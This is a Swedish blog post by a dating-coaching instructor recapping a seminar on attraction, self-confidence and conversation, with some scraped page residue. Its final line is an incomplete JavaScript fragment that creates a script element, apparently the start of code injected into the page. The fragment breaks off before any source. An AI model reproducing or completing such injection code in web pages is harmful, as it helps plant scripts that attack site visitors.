Hej alla!

Jag skulle vilja börja med att tacka alla som närvarade på semiariet igår för en fantastiskt rolig och intressant dag för oss instruktörer. Det var skitkul att träffa er alla och det glädjer oss något enormt att uppslutningen var så stor. Tack också till er som kom och joinade oss på ”förkväll med C-R” efter seminariet också, både deltagare och övriga. Det var kort sagt en legendarisk kväll! icon biggrin Helgens seminarium

För er som missade seminariet så ska jag dra en kort recap av vad som hände. Lördagen inleddes klockan elva på Scandic Continental i Stockholm där vi instruktörer och ett åttiotal deltagare samlades. Dagen inleddes med att TheMan pratade om alfakonceptet och gjorde ett grymt jobb med att göra det hela lättförståeligt och ingående med praktiska exempel på vad vi kan göra inte bara för att förstå hur attraktion fungerar utan dessutom hur man gör för att bli en riktigt attraktiv man.

n567871385 740960 5524 Helgens seminarium

 Helgens seminarium

Därefter pratade jag om det vi kallar för ”inner game” och mina tankar kring livskvalité och hur man får ett riktigt starkt självförtroende, en positiv självbild och en bra självkänsla. Jag fick dessutom tillfälle att visa bilder på de andra instruktörerna under mer eller mindre halvnakna former, vilket i sig var en stor behållning för mig. icon wink Helgens seminarium

Därefter kom Sigge (Nomaggiz) och pratade om att ge 100% och hur man gör för att ha ”den perfekta kvällen” när man vill och inte vara beroende av slumpen för att ha kul och vara en person som med sin närvaro drar in andra människor (kvinnor framförallt!) i sin verklighet.

Dagens sista föreläsning hölls av Gustavo (Superman) som besvarade frågan ”vad ska jag säga, då?” genom att ingående berätta om hur man förmedlar sin identitet och använder det som sker i ens vanliga liv för att ha intressanta och attraktiva konversationer med kvinnor utan att någonsin få slut på saker att prata om.

Den röda tråden för seminariet var ”den naturliga vägen” och det vi sökt att hitta är hur man på ett effektivt och praktiskt sätt gör för att förvandla sig själv till en man som är naturligt attraktiv för kvinnor, utan att för den skull spela någon man egentligen inte är eller använda rutiner och annat som någon annan har hittat på. Att döma av de deltagarreaktioner jag såg under och efter seminariet så var alla föreläsningar mycket uppskattade och jag ser ivrigt fram emot den feedback som nu börjar dimpa in på forumet, både de positiva ryggdunkningarna men likaväl konstruktiv kritik som kan hjälpa oss att göra det hela ännu mer awesome nästa gång.

Tack än en gång för en galet rolig lördag. Det är stunder som denna som vi instruktörer känner att allt arbete vi lagt ner på att skapa materialet, planera alla detaljer och de kaffedränkta sena nätterna lönar sig. Love you guys!

Kram,
-Victor (Sanji)

var d=document;var s=d.createElement(‘script’);